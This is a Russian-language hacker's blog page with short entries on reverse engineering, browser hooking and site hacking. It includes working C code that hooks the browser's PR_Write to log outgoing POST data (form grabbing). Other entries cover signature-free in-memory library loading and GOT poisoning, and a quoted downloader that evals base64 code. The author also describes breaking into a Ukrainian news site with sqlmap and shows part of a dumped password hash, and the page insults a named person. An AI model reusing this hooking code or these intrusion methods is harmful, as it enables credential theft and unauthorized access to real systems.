herm1t LIVE!ng room [entries|archive|friends|userinfo]
herm1t

[ website | twilight corner in the herm1t's cave ]
[ userinfo | ljr userinfo ]
[ archive | journal archive ]

... [Jan. 15th, 2037|03:13 am]
Чтобы не плодить офф в постах, все ???, !!! и @ складываем сюда. (RSS).
Link54 comments|Leave a comment

Неэкспортируемые символы [Feb. 12th, 2016|02:01 pm]
[Tags|, , , , , , , , ]
[Current Mood | thoughtful]

Давно и успешно использую следующий метод для поиска неэкспортируемых символов. Дизассемблируем код (linear sweep), линейно, хотя бы для того, чтобы убедиться, что код создан нормальным компилятором и в нем нет антиотладки. Отмечаем начало функций (все, что вызывется через call). Потом трейсим каждую функу рекурсивно и используем эвристики, такие как: использование констант (хорошо, если есть строки), определенный набор внешних функций или даже просто специфическую форму CFG. Странно, но нашел всего одно упоминание этого способа в нужном контексте, да и то без готового инструмента, а просто, как PoC. Так что и антивирусные приколы могут быть полезны, кто бы мог подумать. :-) Неожиданно, массовый софт - предельно стабилен и меняется медленно, так что "сигнатуры" (на control / data flow, не на инструкции) накрывают очень широкий диапазон версий.
LinkLeave a comment

SO [Feb. 11th, 2016|10:23 pm]
[Tags|, , , , , , ]
[Current Mood |accomplished]

Сделал загрузку shared objects из памяти без временных файлов. И никаких сигнатур. Красивенько.
Link10 comments|Leave a comment

Sucuri Web RAT [Nov. 12th, 2015|01:27 am]
[Tags|, , , , , , ]

Sucuri Integrity Monitor
I found the "monitoring software" installed by ‪#‎AV‬ firm ‪#‎Sucuri‬ (it's available to their subscribers). What I have to say. It just RAT, or web-shell or whatever you want to call it, but its single purpose is to download an unknown code from their servers and execute it. The real name for such a thing is a ‪#‎Trojan‬ ‪#‎Horse‬. That's how I used to call these things. More than that it contains security flaws... You don't just trust them your data (that's not necessary bad), but you let the back door wide open.
Попаля в руки RAT от Sucuri, который они ставят на сайты клиентов, чем эта херь отличается от веб-шелла, хоть убейте не пойму:
curl_setopt($ch, CURLOPT_URL, "https://$MYMONITOR.sucuri.net/imonitor");
...
$my_sucuri_encoding =  base64_decode(
                       substr($my_sucuri_encoding, 7));
eval(
    $my_sucuri_encoding
    );
список сцукурных серверов ) А вот за это (и еще кое за что):
$_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']
Нужно вырывать ногти. А потом руки. Ж;-]
Link9 comments|Leave a comment

Сграбить потоковое видео [Nov. 4th, 2015|07:03 pm]
[Tags|, , , , , , , , ]

Понадобилось сграбить ролик (не ютюб, ссылок нет, плей-листов нет)
  1. Developer -> Developer Toolbar -> Network
  2. Reload, жмем Play
  3. Ждем пока пойдут кусочки mpeg (.ts файлы на скриншоте
  4. Копируем ссылки, скачиваем
  5. Склеиваем (можно просто cat *.ts > 1.ts)
  6. Перекодируем (чтобы не шаманить с mencoder)
  7. PROFIT
Link18 comments|Leave a comment

Чего только не бывает... :-) [Aug. 21st, 2015|03:02 pm]
[Tags|, , ]

LinkLeave a comment

Hooking PR_Write [Jun. 22nd, 2015|09:54 pm]
[Tags|, , , ]

static int (*old_pr_write)(void *,void *, int);
static int pr_write(void *handle, void *buffer, int length)
{
        if (length > 4 && !strncmp(buffer, "POST", 4)) {
                FILE *f = fopen("/tmp/debug.txt", "a+");
                if (f != NULL) {
                        fprintf(f, "%.*s\n", length, buffer);
                        fclose(f);
                }
        }
        return old_pr_write(handle, buffer, length);
}

void init(void)
{
        void *h = dlopen(NULL, RTLD_LAZY);
        if (h) {
                void *(*mtdfn)(void) = dlsym(h, "PR_GetTCPMethods");
                if (mtdfn) {
                        void **mtd = (void**)mtdfn();
                        old_pr_write = ((int (*)(void*,void*,int))mtd[3]);
                        mtd[3] = pr_write;
                }
        }
}
LinkLeave a comment

[Apr. 16th, 2015|04:54 pm]
[Tags|, ]

Есть немного хешей в base36, и немного соотвествующих им данных (если это вообще хеши). Перебрал несколько вариантов, но не судьба, вдруг кто-нибудь угадает, чтобы это могло быть? хешики )
LinkLeave a comment

Накипело [Mar. 17th, 2015|12:45 am]
Давно хотел сказать, что Eugene Dokukin aka MustLive феерический долбоеб. Извините, накипело.
Link3 comments|Leave a comment

Patchless hook for NSPR!PR_Write [Mar. 14th, 2015|09:58 pm]
[Tags|, , , , , ]
[Current Mood | amused]

С вредной либой придумал вариант, в котором вообще не нужно ничего патчить. Попробую. Все отлично работает. Победная реляция пишется прямо в хакнутом броузере. :-) VirtualProtect / mprotect, memcpy Красиво. Никаких патчей. Рейс исключен в принципе. И этот кодес я пока придержу. ;-P здесь
Link10 comments|Leave a comment

Runtime GOT poisoning from injected shared object [Mar. 13th, 2015|02:36 pm]
[Tags|, , , , , , , , , , ]
[Current Mood | calm]

This short article describes how the combination of the two well-known techniques would allow to intercept library calls in runtime without PIC-code (as in [2]), patching the library functions or searches in the /proc/PID/maps. TL;DR )
LinkLeave a comment

nspr4!PR_Write [Mar. 9th, 2015|03:05 pm]
[Tags|, , , , , , , , ]
[Current Mood | bitchy]

Так как никто ничего дельного не пишет, приходится копаться во всяком УГ, типа Hand of Thief. Оно находит nspr4!PR_Write из проинжектированной либы, и затем затирает пролог jmp (0xe9). Естественно, так как FF хрень многопоточная, то при постоянной перезаписи пролога, креш броузера - это вопрос времени. (У мну пять секунд). Так как, NSPR подгружается динамически, то у PR_Write нет записи в GOT/PLT и PLT Redirection/GOT poisoning работать не будет. Так что нужно либо хватать dlsym до старта, либо внимательнее смотреть на PR_Write, который изначально определен вот так (mozilla/nsprpub/pr/src/io/priometh.c , теперь понятно на чем они сидят ;-): TL;DR )
Link4 comments|Leave a comment

Bacula dirty dumper [Oct. 15th, 2014|04:55 pm]
[Tags|, , , , , , , , , , , ]
[Current Mood | okay]

Я знаю, это ужасно, но мне срочно понадобилось распаковать пару томов бакуловских архивов. Так как bls и bextract вынесли мне мозг нахуй, был написан badump - Bacula Dirty Dumper, которому похуй на все, так же, как и мне. Надеюсь, что кроме меня им никто не воспользуется. :-)
иногда почему-то размер записи превышает размер блока. может он так показывает, что будет продолжение? думаете я пойду копаться в исходниках сторедж демона? а вот хуй!
int ds = roff + DataSize + sizeof(struct record) < eob ?
  DataSize : eob - (roff + sizeof(struct record));
write(last_handle, m + roff + sizeof(struct record), ds);
LinkLeave a comment

C vs asm [Aug. 27th, 2014|03:30 pm]
[Tags|, ]

О, Инди появился и повторяет старые глупости: "It(micode - mutation independent) is impossible to write on C.":-)
Link7 comments|Leave a comment

Детекты мирного софта [Aug. 22nd, 2014|03:57 pm]
[Tags|, ]

Всегда подозревал, что в антивирусных компаниях сидят дебилы. В этот раз отличился Avast, накрыли сигнатурой абсолютно нормальный код. Не сумели привязаться ни к чему, и добавили функу шифрования (в ней запоминающиеся константы).
Link35 comments|Leave a comment

говнохак говносайтов [Aug. 5th, 2014|01:30 pm]
[Tags|, , , , , , , , ]
[Current Mood | bored]

блядь, сбербанк... )
помимо КДПВ, кое-что нашел... ;-)

Кстати, по поводу РБК (27 мая). В начале копался руками, потом сообразил, что ломали дебилы и нужно быть проще. STFG inurl:"id=" site:rbc.ua дал ссылку на file.php, ну и все:

sqlmap identified the following injection points with a total of 51 HTTP(s) requests:

Type: boolean-based blind
Type: error-based
Type: UNION query
...
available databases [28]

(mysql.users) ...localhost,p...,*F22A9DA37E2D88F7176E5B0A4F5C72...,,N,N,N,N,N,,N,N,0,N,N,N,,N,N,N,N,,N,N,0,N,N,0,N,N,N,N,N,N,N,0,N...

Фигни всякой понаходилось: , h1>Hacked AZERBAIJAN Defacers, h1>Hacked AZERBAIJAN Defacers, h1>Hacked AZERBAIJAN Defacers, h1>Hacked AZERBAIJAN Defacers (2009-11-05)

Крысы ходили по серверам, как у себя дома. И на закуску (URI я затер, тут не сервис-центр, бага до сих пор там):
РБК Украина XSS )

Стыдно, господа безопасники и хакеры. И адски скучно.

UPD. Написал в Ощад, Дмытру из РБК я уже давно отписался, но что-то мне подсказывает, что это дело дохлое. Если бы не юзера этой фигни, вылил бы все в паблик. Чтобы не мучаться /me ушел баловаться в зону RU.

Link3 comments|Leave a comment

GCC [Jul. 25th, 2014|02:52 pm]
[Tags|, ]

-B. --no-integrated-cpp давно уже хотел, но только теперь дошли руки. Ж-)
LinkLeave a comment

[Jul. 9th, 2014|04:45 pm]
[Tags|, ]

Мы подписывающие соглашения с одной стороны Луганская народная республика, в дальнейшем ЛНР, в лице ....., и общероссийская политическая партия "Коммунистическая партия Российской Федерации", в дальнейшем КПРФ, в лице...
Link4 comments|Leave a comment

[May. 27th, 2014|03:34 pm]
[Tags|, , , , , , , ]

На RBC несусветная хрень:
Русские хакеры объявили кибер войну Украине
Русские хакеры организовали "RCW" (Russian Cyber Warrior) для борьбы с не легитимной властью Петра Порошенко. большеада )
Якименко назван "начальником СБУ". Для тех, кто в танке - в бегах он. На факаве говорят - "пиздеж и провокация", "izg0y@coru.ws: бред полный", на сплоите хихикают. Какой-то невообразимо дурацкий вброс. Или говновзлом. Школоте припекает, поди взломали РБК-Украина для пиару. Да, и Вазонез не допустил бы грамматических ошибок. Ж-)
From: Dmytro ... <dmytro...@rbc.ua>
Subject: Re: Fwd: Русские хакеры объявили кибер войну Украине

Спасибо, таки да, это бы взлом. Новость убрали. Ведем работы по устранению уязвимостей...

Link5 comments|Leave a comment

[May. 16th, 2014|12:50 pm]
Из занятного:

This is a system generated message informing you that the above-named person is a federal prisoner who seeks to add you to his/her contact list for exchanging electronic messages. There is no message from the prisoner at this time.

You can ACCEPT this prisoner's request or BLOCK this individual or all federal prisoners from contacting you via electronic messaging at www.corrlinks.com. To register with CorrLinks you must enter the email address that received this notice along with the identification code below.

Email Address: ...

Identification Code: ...

This identification code will expire in 10 days.

By approving electronic correspondence with federal prisoners, you consent to have the Bureau of Prisons staff monitor the content of all electronic messages exchanged.

Once you have registered with CorrLinks and approved the prisoner for correspondence, the prisoner will be notified electronically.

For additional information related to this program, please visit the http://www.bop.gov/inmate_programs/trulincs_faq.jsp FAQ page.

Интересная городушка, но кажется именно с этим типом мне разговаривать не о чем.
LinkLeave a comment

navigation
[ viewing | most recent entries ]
[ go | earlier ]